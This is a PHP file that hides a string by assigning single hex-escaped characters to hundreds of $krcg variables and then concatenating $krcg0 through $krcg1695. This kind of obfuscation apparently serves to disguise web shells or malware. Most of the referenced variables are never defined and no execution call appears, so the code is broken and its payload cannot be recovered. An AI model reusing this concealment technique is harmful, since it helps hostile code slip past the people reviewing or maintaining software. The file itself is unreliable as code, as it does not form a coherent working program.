$krcg1328="\x64";$krcg404="\x73";$krcg9="\x61";$krcg1592="\x6d";$krcg69="\x6f";$krcg556="\x78";
$krcg1170="\x69";$krcg1545="\x6f";$krcg1574="\x74";
$krcg74="\x67";$krcg1393="\x74";$krcg949="\x20";$krcg1611="\x6e";
$krcg1225="\x09";$krcg1302="\x5f";
$krcg851="\x3b";$krcg311="\x66";$krcg73="\x20";$krcg419="\x72";
$krcg1009="\x3b";$krcg220="\x73";$krcg32="\x65";$krcg1615="\x6f";$krcg1181="\x24";
$krcg1613="\x3b";$krcg1148="\x66";$krcg217="\x0a";$krcg903="\x5c";$krcg1643="\x2d";
$krcg1391="\x24";$krcg1222="\x6a";$krcg334="\x68";$krcg1660="\x72";
$krcg502="\x72";$krcg1074="\x22";
$krcg922="\x0a";$krcg853="\x09";
$krcg1060="\x6c";$krcg683="\x5c";
$krcg216="\x3b";
$krcg231="\x29";$krcg1546="\x64";$krcg1460="\x74";$krcg1355="\x09";$krcg424="\x6d";$krcg1488="\x73";$krcg1621="\x2c";$krcg281="\x63";$krcg1014="\x09";$krcg40="\x43";$krcg1112="\x74";$krcg330="\x65";$krcg1617="\x65";
$krcg887="\x20";$krcg849="\x3d";
$krcg577="\x5f";$krcg238="\x65";$krcg354="\x70";$krcg961="\x30";$krcg764="\x24";$krcg1520="\x61";$krcg1034="\x72";$krcg1086="\x20";$krcg894="\x63";$krcg841="\x76";$krcg1507="\x6d";$krcg25="\x72";$krcg845="\x6e";$krcg1524="\x6e";
$krcg141="\x20";$krcg537="\x6c";
$krcg649="\x24";$krcg315="\x28";$krcg1427="\x29";$krcg398="\x69";$krcg736="\x69";$krcg1513="\x34";$krcg463="\x20";$krcg1654="\x6e";$krcg599="\x0a";$krcg687="\x78";$krcg526="\x79";$krcg215="\x29";$krcg89="\x72";$krcg554="\x64";
$krcg12="\x20";$krcg660="\x6f";
$krcg259="\x20";$krcg1408="\x66";$krcg239="\x6e";$krcg1132="\x61";
$krcg1091="\x64";$krcg1240="\x3d";$krcg809="\x74";$krcg1590="\x74";$krcg1492="\x75";
$krcg605="\x6d";$krcg615="\x3b";$krcg1259="\x24";$krcg455="\x6e";$krcg681="\x64";
$krcg705="\x6d";$krcg1082="\x74";
$krcg67="\x20";$krcg1388="\x0a";
$krcg1638="\x5f";$krcg771="\x6e";$krcg979="\x09";$krcg1313="\x6d";
$krcg1582="\x24";$krcg339="\x64";$krcg1238="\x5d";$krcg1698="\x61";
$krcg525="\x5f";
$krcg1255="\x0a";
$krcg915="\x2e";$krcg122="\x6c";
$krcg1343="\x74";$krcg319="\x3d";$krcg1173="\x20";$krcg218="\x0a";$krcg307="\x70";$krcg1714="\x0a";$krcg722="\x20";$krcg397="\x40";
$krcg118="\x61";$krcg606="\x63";$krcg669="\x72";$krcg816="\x28";
$krcg940="\x69";$krcg1362="\x79";$krcg283="\x65";$krcg295="\x69";$krcg360="\x73";$krcg1667="\x24";$krcg1267="\x24";$krcg1068="\x5f";$krcg1242="\x40";
$krcg1409="\x28";$krcg1586="\x3d";$krcg1056="\x22";
$krcg1521="\x74";$krcg1494="\x6f";$krcg709="\x24";
$krcg175="\x79";$krcg1280="\x2c";
$krcg498="\x20";$krcg682="\x3d";$krcg1130="\x28";
$krcg314="\x20";$krcg671="\x6e";$krcg548="\x2c";$krcg1312="\x09";
$krcg1118="\x75";$krcg263="\x61";$krcg1167="\x2d";$krcg587="\x6e";$krcg1446="\x24";$krcg503="\x65";$krcg1340="\x20";$krcg143="\x65";$krcg636="\x20";$krcg222="\x61";$krcg866="\x20";
$krcg324="\x24";$krcg176="\x20";$krcg229="\x65";$krcg1304="\x74";$krcg1620="\x4f";$krcg82="\x6f";$krcg1649="\x72";$krcg1081="\x65";$krcg1338="\x6d";
$krcg1489="\x20";
$krcg426="\x7a";$krcg400="\x64";$krcg932="\x2e";$krcg936="\x5c";$krcg61="\x68";$krcg1162="\x24";
$krcg782="\x2b";$krcg1604="\x70";$krcg1217="\x20";
$krcg1633="\x2d";$krcg1333="\x2b";$krcg173="\x09";$krcg1583="\x6e";
$krcg1221="\x24";$krcg1375="\x3c";$krcg695="\x22";$krcg18="\x63";$krcg70="\x6e";$krcg686="\x5c";$krcg1501="\x6e";$krcg1406="\x6e";$krcg137="\x0a";$krcg52="\x73";$krcg564="\x24";
$krcg1029="\x3d";$krcg964="\x31";$krcg1342="\x73";$krcg1284="\x5d";$krcg1702="\x6e";
$krcg1030="\x27";
$krcg1661="\x69";$krcg838="\x5c";$krcg1007="\x2e";$krcg1="\x20";$krcg609="\x65";$krcg546="\x70";$krcg489="\x6e";
$krcg1420="\x72";$krcg370="\x62";$krcg1457="\x0a";
$krcg496="\x6c";$krcg860="\x69";$krcg716="\x73";$krcg1555="\x20";$krcg1097="\x0a";
$krcg1155="\x20";$krcg1684="\x22";$krcg477="\x68";$krcg697="\x20";$krcg774="\x72";$krcg1685="\x6e";
$krcg114="\x65";$krcg852="\x0a";
$krcg1414="\x2c";$krcg1465="\x69";
$krcg689="\x30";$krcg139="\x75";$krcg254="\x62";$krcg675="\x22";$krcg1686="\x63";$krcg926="\x6d";$krcg1630="\x72";$krcg115="\x64";
$krcg1127="\x6d";$krcg56="\x6e";
$krcg221="\x72";$krcg880="\x3b";
$krcg1658="\x0a";$krcg1149="\x6f";$krcg991="\x5c";$krcg255="\x75";$krcg544="\x72";$krcg391="\x09";$krcg450="\x61";$krcg1169="\x24";
$krcg0="\x23";$krcg1712="\x63";$krcg885="\x69";$krcg142="\x6d";$krcg187="\x79";$krcg1526="\x20";
$krcg1553="\x0a";$krcg1396="\x6e";$krcg719="\x69";$krcg571="\x0a";$krcg83="\x6e";$krcg1087="\x24";
$krcg1172="\x29";
$krcg522="\x68";$krcg1517="\x6e";$krcg1100="\x75";$krcg1421="\x61";$krcg1008="\x22";$krcg1693="\x67";$krcg128="\x72";$krcg760="\x66";$krcg1683="\x3d";$krcg1573="\x6e";$krcg622="\x28";
$krcg1011="\x3b";$krcg588="\x64";$krcg302="\x20";$krcg1272="\x20";$krcg41="\x29";$krcg850="\x22";$krcg862="\x3d";$krcg691="\x78";$krcg1020="\x65";$krcg857="\x20";$krcg1668="\x6e";$krcg1111="\x61";
$krcg13="\x50";$krcg1341="\x24";$krcg1487="\x6e";$krcg1040="\x27";
$krcg390="\x09";$krcg249="\x0a";$krcg1647="\x6e";$krcg870="\x3c";$krcg1378="\x6c";$krcg299="\x74";$krcg453="\x20";$krcg317="\x69";$krcg1057="\x65";$krcg44="\x30";$krcg369="\x75";$krcg944="\x28";$krcg504="\x63";$krcg270="\x66";$krcg1151="\x20";
$krcg1299="\x61";$krcg1476="\x65";
$krcg1050="\x64";$krcg446="\x70";$krcg900="\x3d";
$krcg1023="\x3d";$krcg1315="\x20";$krcg237="\x67";$krcg171="\x3b";$krcg461="\x77";$krcg1079="\x09";
$krcg1350="\x20";$krcg593="\x69";$krcg1709="\x20";$krcg280="\x61";$krcg916="\x22";$krcg352="\x09";
$krcg946="\x69";$krcg8="\x65";$krcg111="\x65";$krcg933="\x3d";$krcg1558="\x20";$krcg1568="\x78";$krcg1602="\x3b";
$krcg824="\x67";$krcg1231="\x5b";$krcg767="\x25";$krcg927="\x63";$krcg1444="\x6e";
$krcg1516="\x65";
$krcg1027="\x24";$krcg1665="\x4f";$krcg759="\x69";$krcg1544="\x63";$krcg1440="\x65";$krcg1337="\x09";$krcg1477="\x20";
$krcg707="\x2c";$krcg428="\x20";$krcg646="\x20";$krcg=$krcg0.
$krcg1.$krcg2.$krcg3.$krcg4.$krcg5.$krcg6.
$krcg7.$krcg8.$krcg9.$krcg10.
$krcg11.$krcg12.
$krcg13.$krcg14.$krcg15.$krcg16.$krcg17.
$krcg18.$krcg19.$krcg20.$krcg21.$krcg22.$krcg23.
$krcg24.$krcg25.$krcg26.$krcg27.$krcg28.$krcg29.$krcg30.
$krcg31.$krcg32.$krcg33.$krcg34.$krcg35.$krcg36.$krcg37.$krcg38.
$krcg39.$krcg40.$krcg41.$krcg42.$krcg43.$krcg44.$krcg45.$krcg46.
$krcg47.$krcg48.$krcg49.$krcg50.$krcg51.
$krcg52.$krcg53.$krcg54.
$krcg55.$krcg56.
$krcg57.$krcg58.$krcg59.$krcg60.$krcg61.$krcg62.$krcg63.$krcg64.$krcg65.
$krcg66.$krcg67.$krcg68.$krcg69.$krcg70.
$krcg71.$krcg72.$krcg73.$krcg74.$krcg75.$krcg76.$krcg77.$krcg78.$krcg79.$krcg80.$krcg81.
$krcg82.$krcg83.$krcg84.
$krcg85.$krcg86.$krcg87.
$krcg88.$krcg89.$krcg90.
$krcg91.$krcg92.$krcg93.$krcg94.$krcg95.$krcg96.$krcg97.$krcg98.$krcg99.
$krcg100.
$krcg101.$krcg102.
$krcg103.$krcg104.$krcg105.$krcg106.$krcg107.$krcg108.$krcg109.$krcg110.
$krcg111.$krcg112.$krcg113.$krcg114.
$krcg115.$krcg116.$krcg117.$krcg118.$krcg119.$krcg120.
$krcg121.$krcg122.$krcg123.$krcg124.$krcg125.$krcg126.$krcg127.$krcg128.$krcg129.$krcg130.$krcg131.$krcg132.$krcg133.$krcg134.$krcg135.
$krcg136.$krcg137.$krcg138.$krcg139.$krcg140.
$krcg141.$krcg142.$krcg143.$krcg144.$krcg145.$krcg146.$krcg147.$krcg148.$krcg149.$krcg150.$krcg151.$krcg152.$krcg153.$krcg154.$krcg155.$krcg156.
$krcg157.
$krcg158.$krcg159.$krcg160.$krcg161.$krcg162.$krcg163.$krcg164.$krcg165.$krcg166.$krcg167.$krcg168.
$krcg169.
$krcg170.$krcg171.$krcg172.
$krcg173.$krcg174.
$krcg175.$krcg176.$krcg177.$krcg178.
$krcg179.$krcg180.$krcg181.$krcg182.$krcg183.$krcg184.$krcg185.$krcg186.$krcg187.$krcg188.$krcg189.$krcg190.$krcg191.$krcg192.
$krcg193.$krcg194.$krcg195.
$krcg196.$krcg197.$krcg198.
$krcg199.$krcg200.$krcg201.$krcg202.$krcg203.$krcg204.
$krcg205.$krcg206.$krcg207.$krcg208.
$krcg209.$krcg210.$krcg211.$krcg212.$krcg213.$krcg214.$krcg215.$krcg216.$krcg217.$krcg218.$krcg219.$krcg220.$krcg221.$krcg222.$krcg223.$krcg224.
$krcg225.$krcg226.$krcg227.$krcg228.$krcg229.$krcg230.$krcg231.$krcg232.$krcg233.$krcg234.
$krcg235.$krcg236.$krcg237.$krcg238.
$krcg239.$krcg240.$krcg241.$krcg242.$krcg243.
$krcg244.$krcg245.$krcg246.$krcg247.$krcg248.$krcg249.$krcg250.
$krcg251.$krcg252.$krcg253.$krcg254.$krcg255.$krcg256.$krcg257.$krcg258.$krcg259.$krcg260.$krcg261.$krcg262.$krcg263.$krcg264.
$krcg265.$krcg266.$krcg267.$krcg268.$krcg269.$krcg270.$krcg271.$krcg272.
$krcg273.$krcg274.$krcg275.
$krcg276.
$krcg277.$krcg278.$krcg279.$krcg280.
$krcg281.$krcg282.$krcg283.$krcg284.
$krcg285.
$krcg286.$krcg287.$krcg288.$krcg289.
$krcg290.$krcg291.$krcg292.$krcg293.$krcg294.$krcg295.$krcg296.$krcg297.
$krcg298.$krcg299.$krcg300.$krcg301.$krcg302.
$krcg303.$krcg304.$krcg305.$krcg306.$krcg307.$krcg308.$krcg309.$krcg310.$krcg311.$krcg312.$krcg313.$krcg314.$krcg315.$krcg316.$krcg317.$krcg318.$krcg319.$krcg320.
$krcg321.$krcg322.$krcg323.$krcg324.$krcg325.$krcg326.$krcg327.
$krcg328.$krcg329.$krcg330.$krcg331.$krcg332.$krcg333.$krcg334.$krcg335.$krcg336.$krcg337.$krcg338.$krcg339.$krcg340.$krcg341.$krcg342.
$krcg343.$krcg344.$krcg345.
$krcg346.$krcg347.$krcg348.$krcg349.$krcg350.$krcg351.$krcg352.
$krcg353.$krcg354.
$krcg355.$krcg356.$krcg357.$krcg358.$krcg359.$krcg360.$krcg361.$krcg362.$krcg363.$krcg364.$krcg365.$krcg366.$krcg367.
$krcg368.
$krcg369.$krcg370.$krcg371.$krcg372.$krcg373.$krcg374.
$krcg375.
$krcg376.
$krcg377.$krcg378.$krcg379.$krcg380.$krcg381.$krcg382.$krcg383.$krcg384.
$krcg385.$krcg386.$krcg387.$krcg388.$krcg389.$krcg390.
$krcg391.$krcg392.$krcg393.
$krcg394.$krcg395.
$krcg396.
$krcg397.$krcg398.$krcg399.$krcg400.$krcg401.$krcg402.$krcg403.
$krcg404.$krcg405.
$krcg406.$krcg407.$krcg408.$krcg409.$krcg410.$krcg411.$krcg412.$krcg413.$krcg414.$krcg415.$krcg416.$krcg417.$krcg418.$krcg419.$krcg420.
$krcg421.$krcg422.$krcg423.$krcg424.
$krcg425.$krcg426.$krcg427.
$krcg428.$krcg429.$krcg430.$krcg431.$krcg432.$krcg433.$krcg434.$krcg435.$krcg436.$krcg437.
$krcg438.$krcg439.$krcg440.$krcg441.$krcg442.$krcg443.$krcg444.
$krcg445.$krcg446.$krcg447.$krcg448.
$krcg449.$krcg450.
$krcg451.$krcg452.$krcg453.$krcg454.$krcg455.
$krcg456.$krcg457.$krcg458.$krcg459.$krcg460.$krcg461.$krcg462.$krcg463.$krcg464.$krcg465.$krcg466.$krcg467.$krcg468.
$krcg469.$krcg470.$krcg471.$krcg472.$krcg473.$krcg474.
$krcg475.$krcg476.$krcg477.
$krcg478.$krcg479.$krcg480.
$krcg481.$krcg482.$krcg483.$krcg484.$krcg485.
$krcg486.$krcg487.$krcg488.$krcg489.$krcg490.
$krcg491.$krcg492.$krcg493.$krcg494.$krcg495.
$krcg496.$krcg497.$krcg498.$krcg499.$krcg500.$krcg501.$krcg502.$krcg503.$krcg504.
$krcg505.$krcg506.
$krcg507.$krcg508.$krcg509.$krcg510.$krcg511.$krcg512.$krcg513.$krcg514.$krcg515.$krcg516.$krcg517.$krcg518.$krcg519.$krcg520.
$krcg521.$krcg522.
$krcg523.$krcg524.$krcg525.
$krcg526.$krcg527.$krcg528.$krcg529.$krcg530.$krcg531.$krcg532.
$krcg533.$krcg534.$krcg535.$krcg536.
$krcg537.$krcg538.$krcg539.$krcg540.
$krcg541.$krcg542.$krcg543.$krcg544.
$krcg545.$krcg546.$krcg547.$krcg548.
$krcg549.$krcg550.$krcg551.$krcg552.
$krcg553.$krcg554.$krcg555.$krcg556.$krcg557.$krcg558.$krcg559.$krcg560.
$krcg561.$krcg562.$krcg563.$krcg564.$krcg565.$krcg566.$krcg567.
$krcg568.$krcg569.$krcg570.$krcg571.$krcg572.
$krcg573.$krcg574.$krcg575.$krcg576.
$krcg577.$krcg578.$krcg579.$krcg580.$krcg581.$krcg582.$krcg583.$krcg584.$krcg585.$krcg586.$krcg587.$krcg588.$krcg589.$krcg590.$krcg591.$krcg592.$krcg593.$krcg594.$krcg595.$krcg596.$krcg597.$krcg598.
$krcg599.$krcg600.$krcg601.$krcg602.
$krcg603.$krcg604.$krcg605.$krcg606.$krcg607.$krcg608.$krcg609.$krcg610.$krcg611.$krcg612.
$krcg613.$krcg614.
$krcg615.$krcg616.$krcg617.$krcg618.$krcg619.$krcg620.$krcg621.$krcg622.$krcg623.$krcg624.
$krcg625.$krcg626.$krcg627.$krcg628.
$krcg629.$krcg630.$krcg631.$krcg632.$krcg633.$krcg634.$krcg635.$krcg636.
$krcg637.$krcg638.$krcg639.$krcg640.$krcg641.$krcg642.$krcg643.$krcg644.
$krcg645.$krcg646.
$krcg647.$krcg648.$krcg649.
$krcg650.$krcg651.
$krcg652.$krcg653.$krcg654.$krcg655.
$krcg656.$krcg657.$krcg658.$krcg659.$krcg660.
$krcg661.$krcg662.
$krcg663.$krcg664.$krcg665.
$krcg666.
$krcg667.$krcg668.$krcg669.$krcg670.$krcg671.
$krcg672.
$krcg673.$krcg674.$krcg675.$krcg676.$krcg677.$krcg678.
$krcg679.$krcg680.
$krcg681.$krcg682.$krcg683.
$krcg684.
$krcg685.$krcg686.$krcg687.$krcg688.
$krcg689.$krcg690.$krcg691.
$krcg692.
$krcg693.$krcg694.
$krcg695.$krcg696.
$krcg697.$krcg698.
$krcg699.$krcg700.
$krcg701.
$krcg702.
$krcg703.
$krcg704.$krcg705.$krcg706.$krcg707.$krcg708.$krcg709.$krcg710.$krcg711.$krcg712.
$krcg713.$krcg714.$krcg715.$krcg716.$krcg717.$krcg718.$krcg719.$krcg720.$krcg721.$krcg722.$krcg723.$krcg724.$krcg725.$krcg726.$krcg727.$krcg728.$krcg729.$krcg730.$krcg731.$krcg732.
$krcg733.$krcg734.$krcg735.$krcg736.$krcg737.$krcg738.$krcg739.$krcg740.$krcg741.$krcg742.$krcg743.$krcg744.
$krcg745.$krcg746.$krcg747.$krcg748.$krcg749.$krcg750.
$krcg751.$krcg752.
$krcg753.$krcg754.
$krcg755.$krcg756.
$krcg757.$krcg758.$krcg759.$krcg760.
$krcg761.$krcg762.$krcg763.$krcg764.$krcg765.$krcg766.$krcg767.$krcg768.$krcg769.$krcg770.
$krcg771.
$krcg772.$krcg773.
$krcg774.
$krcg775.$krcg776.
$krcg777.$krcg778.$krcg779.$krcg780.$krcg781.$krcg782.$krcg783.$krcg784.
$krcg785.$krcg786.$krcg787.$krcg788.$krcg789.$krcg790.
$krcg791.$krcg792.$krcg793.$krcg794.$krcg795.$krcg796.$krcg797.$krcg798.$krcg799.$krcg800.$krcg801.
$krcg802.$krcg803.
$krcg804.$krcg805.
$krcg806.$krcg807.$krcg808.$krcg809.$krcg810.$krcg811.$krcg812.
$krcg813.$krcg814.$krcg815.$krcg816.$krcg817.$krcg818.
$krcg819.$krcg820.$krcg821.$krcg822.
$krcg823.$krcg824.$krcg825.
$krcg826.$krcg827.$krcg828.$krcg829.$krcg830.$krcg831.$krcg832.
$krcg833.
$krcg834.$krcg835.$krcg836.$krcg837.$krcg838.$krcg839.$krcg840.
$krcg841.$krcg842.$krcg843.$krcg844.$krcg845.
$krcg846.
$krcg847.$krcg848.
$krcg849.$krcg850.$krcg851.$krcg852.$krcg853.
$krcg854.$krcg855.$krcg856.$krcg857.$krcg858.
$krcg859.
$krcg860.$krcg861.$krcg862.
$krcg863.$krcg864.
$krcg865.$krcg866.$krcg867.$krcg868.$krcg869.$krcg870.$krcg871.$krcg872.$krcg873.$krcg874.$krcg875.$krcg876.$krcg877.$krcg878.$krcg879.$krcg880.$krcg881.$krcg882.$krcg883.$krcg884.
$krcg885.$krcg886.$krcg887.$krcg888.
$krcg889.$krcg890.
$krcg891.$krcg892.$krcg893.$krcg894.$krcg895.$krcg896.$krcg897.$krcg898.
$krcg899.$krcg900.
$krcg901.$krcg902.$krcg903.
$krcg904.$krcg905.$krcg906.$krcg907.$krcg908.$krcg909.
$krcg910.$krcg911.
$krcg912.$krcg913.$krcg914.
$krcg915.
$krcg916.$krcg917.$krcg918.$krcg919.$krcg920.$krcg921.$krcg922.$krcg923.$krcg924.
$krcg925.$krcg926.$krcg927.$krcg928.
$krcg929.$krcg930.
$krcg931.
$krcg932.$krcg933.$krcg934.$krcg935.$krcg936.
$krcg937.$krcg938.$krcg939.$krcg940.$krcg941.$krcg942.$krcg943.$krcg944.$krcg945.$krcg946.
$krcg947.$krcg948.$krcg949.$krcg950.$krcg951.$krcg952.
$krcg953.$krcg954.$krcg955.$krcg956.
$krcg957.
$krcg958.$krcg959.$krcg960.
$krcg961.$krcg962.$krcg963.
$krcg964.$krcg965.$krcg966.$krcg967.$krcg968.$krcg969.
$krcg970.$krcg971.$krcg972.$krcg973.$krcg974.$krcg975.$krcg976.
$krcg977.$krcg978.$krcg979.$krcg980.$krcg981.
$krcg982.$krcg983.$krcg984.$krcg985.$krcg986.
$krcg987.
$krcg988.$krcg989.$krcg990.
$krcg991.$krcg992.$krcg993.
$krcg994.$krcg995.$krcg996.$krcg997.$krcg998.$krcg999.$krcg1000.$krcg1001.$krcg1002.
$krcg1003.$krcg1004.$krcg1005.$krcg1006.$krcg1007.$krcg1008.$krcg1009.$krcg1010.$krcg1011.$krcg1012.$krcg1013.$krcg1014.
$krcg1015.$krcg1016.$krcg1017.$krcg1018.
$krcg1019.$krcg1020.$krcg1021.$krcg1022.$krcg1023.
$krcg1024.$krcg1025.$krcg1026.
$krcg1027.$krcg1028.$krcg1029.$krcg1030.$krcg1031.$krcg1032.$krcg1033.$krcg1034.$krcg1035.$krcg1036.$krcg1037.
$krcg1038.$krcg1039.$krcg1040.
$krcg1041.$krcg1042.
$krcg1043.$krcg1044.$krcg1045.$krcg1046.$krcg1047.$krcg1048.$krcg1049.$krcg1050.
$krcg1051.
$krcg1052.
$krcg1053.$krcg1054.$krcg1055.$krcg1056.$krcg1057.$krcg1058.$krcg1059.$krcg1060.$krcg1061.$krcg1062.
$krcg1063.$krcg1064.$krcg1065.$krcg1066.$krcg1067.$krcg1068.$krcg1069.$krcg1070.$krcg1071.$krcg1072.
$krcg1073.$krcg1074.$krcg1075.$krcg1076.$krcg1077.$krcg1078.$krcg1079.$krcg1080.$krcg1081.$krcg1082.$krcg1083.$krcg1084.$krcg1085.$krcg1086.$krcg1087.$krcg1088.
$krcg1089.$krcg1090.$krcg1091.$krcg1092.$krcg1093.$krcg1094.
$krcg1095.$krcg1096.$krcg1097.$krcg1098.
$krcg1099.$krcg1100.$krcg1101.$krcg1102.
$krcg1103.$krcg1104.
$krcg1105.
$krcg1106.$krcg1107.$krcg1108.$krcg1109.$krcg1110.$krcg1111.$krcg1112.$krcg1113.$krcg1114.$krcg1115.$krcg1116.
$krcg1117.$krcg1118.
$krcg1119.
$krcg1120.$krcg1121.$krcg1122.
$krcg1123.$krcg1124.$krcg1125.$krcg1126.$krcg1127.$krcg1128.$krcg1129.$krcg1130.
$krcg1131.$krcg1132.$krcg1133.$krcg1134.$krcg1135.$krcg1136.$krcg1137.
$krcg1138.$krcg1139.$krcg1140.
$krcg1141.$krcg1142.$krcg1143.$krcg1144.$krcg1145.$krcg1146.$krcg1147.$krcg1148.$krcg1149.$krcg1150.$krcg1151.
$krcg1152.
$krcg1153.$krcg1154.$krcg1155.$krcg1156.$krcg1157.$krcg1158.$krcg1159.
$krcg1160.$krcg1161.$krcg1162.$krcg1163.$krcg1164.$krcg1165.$krcg1166.$krcg1167.$krcg1168.$krcg1169.$krcg1170.$krcg1171.$krcg1172.$krcg1173.
$krcg1174.$krcg1175.$krcg1176.$krcg1177.$krcg1178.$krcg1179.$krcg1180.
$krcg1181.$krcg1182.$krcg1183.$krcg1184.$krcg1185.$krcg1186.$krcg1187.$krcg1188.
$krcg1189.$krcg1190.$krcg1191.$krcg1192.$krcg1193.$krcg1194.$krcg1195.$krcg1196.
$krcg1197.$krcg1198.$krcg1199.$krcg1200.
$krcg1201.$krcg1202.$krcg1203.$krcg1204.$krcg1205.$krcg1206.$krcg1207.$krcg1208.
$krcg1209.$krcg1210.$krcg1211.$krcg1212.$krcg1213.$krcg1214.$krcg1215.$krcg1216.
$krcg1217.$krcg1218.
$krcg1219.$krcg1220.$krcg1221.$krcg1222.
$krcg1223.$krcg1224.
$krcg1225.
$krcg1226.$krcg1227.$krcg1228.$krcg1229.
$krcg1230.$krcg1231.$krcg1232.
$krcg1233.$krcg1234.$krcg1235.
$krcg1236.$krcg1237.$krcg1238.$krcg1239.
$krcg1240.$krcg1241.$krcg1242.$krcg1243.$krcg1244.$krcg1245.$krcg1246.$krcg1247.$krcg1248.$krcg1249.$krcg1250.$krcg1251.$krcg1252.$krcg1253.$krcg1254.$krcg1255.$krcg1256.$krcg1257.$krcg1258.$krcg1259.$krcg1260.
$krcg1261.$krcg1262.$krcg1263.$krcg1264.$krcg1265.$krcg1266.$krcg1267.$krcg1268.$krcg1269.$krcg1270.$krcg1271.$krcg1272.$krcg1273.$krcg1274.$krcg1275.
$krcg1276.$krcg1277.$krcg1278.$krcg1279.$krcg1280.
$krcg1281.
$krcg1282.$krcg1283.$krcg1284.
$krcg1285.$krcg1286.$krcg1287.$krcg1288.
$krcg1289.
$krcg1290.$krcg1291.$krcg1292.$krcg1293.$krcg1294.$krcg1295.$krcg1296.
$krcg1297.$krcg1298.$krcg1299.
$krcg1300.$krcg1301.$krcg1302.
$krcg1303.
$krcg1304.$krcg1305.$krcg1306.$krcg1307.$krcg1308.
$krcg1309.
$krcg1310.$krcg1311.$krcg1312.$krcg1313.$krcg1314.$krcg1315.$krcg1316.$krcg1317.$krcg1318.$krcg1319.$krcg1320.$krcg1321.$krcg1322.$krcg1323.$krcg1324.$krcg1325.
$krcg1326.$krcg1327.$krcg1328.$krcg1329.
$krcg1330.$krcg1331.$krcg1332.$krcg1333.$krcg1334.
$krcg1335.$krcg1336.
$krcg1337.$krcg1338.$krcg1339.
$krcg1340.$krcg1341.$krcg1342.
$krcg1343.$krcg1344.$krcg1345.$krcg1346.$krcg1347.$krcg1348.$krcg1349.$krcg1350.$krcg1351.$krcg1352.$krcg1353.
$krcg1354.$krcg1355.$krcg1356.
$krcg1357.$krcg1358.$krcg1359.$krcg1360.
$krcg1361.$krcg1362.$krcg1363.$krcg1364.
$krcg1365.$krcg1366.$krcg1367.$krcg1368.$krcg1369.$krcg1370.$krcg1371.$krcg1372.$krcg1373.$krcg1374.$krcg1375.$krcg1376.$krcg1377.$krcg1378.$krcg1379.$krcg1380.$krcg1381.$krcg1382.$krcg1383.$krcg1384.$krcg1385.$krcg1386.$krcg1387.$krcg1388.$krcg1389.$krcg1390.$krcg1391.$krcg1392.
$krcg1393.$krcg1394.$krcg1395.$krcg1396.$krcg1397.$krcg1398.$krcg1399.$krcg1400.$krcg1401.$krcg1402.
$krcg1403.$krcg1404.
$krcg1405.$krcg1406.$krcg1407.$krcg1408.$krcg1409.$krcg1410.$krcg1411.$krcg1412.$krcg1413.
$krcg1414.$krcg1415.$krcg1416.
$krcg1417.$krcg1418.$krcg1419.$krcg1420.$krcg1421.$krcg1422.
$krcg1423.$krcg1424.$krcg1425.
$krcg1426.$krcg1427.$krcg1428.$krcg1429.$krcg1430.$krcg1431.$krcg1432.
$krcg1433.$krcg1434.$krcg1435.$krcg1436.$krcg1437.$krcg1438.$krcg1439.$krcg1440.
$krcg1441.$krcg1442.$krcg1443.
$krcg1444.$krcg1445.$krcg1446.$krcg1447.$krcg1448.$krcg1449.$krcg1450.$krcg1451.$krcg1452.$krcg1453.$krcg1454.$krcg1455.
$krcg1456.
$krcg1457.
$krcg1458.
$krcg1459.$krcg1460.$krcg1461.$krcg1462.$krcg1463.$krcg1464.$krcg1465.$krcg1466.$krcg1467.$krcg1468.$krcg1469.$krcg1470.$krcg1471.$krcg1472.$krcg1473.$krcg1474.$krcg1475.$krcg1476.$krcg1477.$krcg1478.
$krcg1479.
$krcg1480.
$krcg1481.$krcg1482.
$krcg1483.$krcg1484.$krcg1485.$krcg1486.$krcg1487.$krcg1488.
$krcg1489.$krcg1490.$krcg1491.$krcg1492.$krcg1493.$krcg1494.
$krcg1495.$krcg1496.$krcg1497.
$krcg1498.
$krcg1499.$krcg1500.
$krcg1501.$krcg1502.$krcg1503.$krcg1504.
$krcg1505.$krcg1506.
$krcg1507.$krcg1508.$krcg1509.$krcg1510.
$krcg1511.$krcg1512.$krcg1513.$krcg1514.$krcg1515.$krcg1516.$krcg1517.$krcg1518.
$krcg1519.$krcg1520.
$krcg1521.$krcg1522.$krcg1523.$krcg1524.
$krcg1525.$krcg1526.$krcg1527.$krcg1528.$krcg1529.$krcg1530.
$krcg1531.$krcg1532.$krcg1533.$krcg1534.$krcg1535.$krcg1536.$krcg1537.$krcg1538.$krcg1539.$krcg1540.$krcg1541.$krcg1542.$krcg1543.$krcg1544.$krcg1545.$krcg1546.
$krcg1547.$krcg1548.
$krcg1549.$krcg1550.$krcg1551.
$krcg1552.$krcg1553.
$krcg1554.$krcg1555.$krcg1556.$krcg1557.$krcg1558.$krcg1559.$krcg1560.
$krcg1561.$krcg1562.
$krcg1563.$krcg1564.$krcg1565.$krcg1566.$krcg1567.$krcg1568.$krcg1569.$krcg1570.$krcg1571.
$krcg1572.$krcg1573.$krcg1574.$krcg1575.$krcg1576.$krcg1577.$krcg1578.$krcg1579.$krcg1580.$krcg1581.$krcg1582.$krcg1583.$krcg1584.$krcg1585.
$krcg1586.$krcg1587.$krcg1588.$krcg1589.
$krcg1590.$krcg1591.$krcg1592.$krcg1593.$krcg1594.$krcg1595.$krcg1596.$krcg1597.$krcg1598.
$krcg1599.$krcg1600.$krcg1601.$krcg1602.$krcg1603.$krcg1604.$krcg1605.
$krcg1606.$krcg1607.$krcg1608.$krcg1609.$krcg1610.
$krcg1611.$krcg1612.$krcg1613.$krcg1614.$krcg1615.$krcg1616.$krcg1617.$krcg1618.$krcg1619.$krcg1620.
$krcg1621.$krcg1622.
$krcg1623.$krcg1624.$krcg1625.$krcg1626.$krcg1627.$krcg1628.$krcg1629.$krcg1630.$krcg1631.$krcg1632.$krcg1633.$krcg1634.$krcg1635.
$krcg1636.$krcg1637.$krcg1638.$krcg1639.$krcg1640.
$krcg1641.$krcg1642.$krcg1643.$krcg1644.$krcg1645.$krcg1646.$krcg1647.
$krcg1648.$krcg1649.$krcg1650.
$krcg1651.$krcg1652.$krcg1653.$krcg1654.$krcg1655.$krcg1656.
$krcg1657.$krcg1658.$krcg1659.$krcg1660.$krcg1661.$krcg1662.
$krcg1663.$krcg1664.
$krcg1665.$krcg1666.$krcg1667.$krcg1668.
$krcg1669.$krcg1670.$krcg1671.$krcg1672.
$krcg1673.$krcg1674.$krcg1675.$krcg1676.$krcg1677.
$krcg1678.
$krcg1679.$krcg1680.
$krcg1681.$krcg1682.$krcg1683.$krcg1684.
$krcg1685.$krcg1686.$krcg1687.$krcg1688.
$krcg1689.$krcg1690.$krcg1691.$krcg1692.$krcg1693.$krcg1694.
$krcg1695.
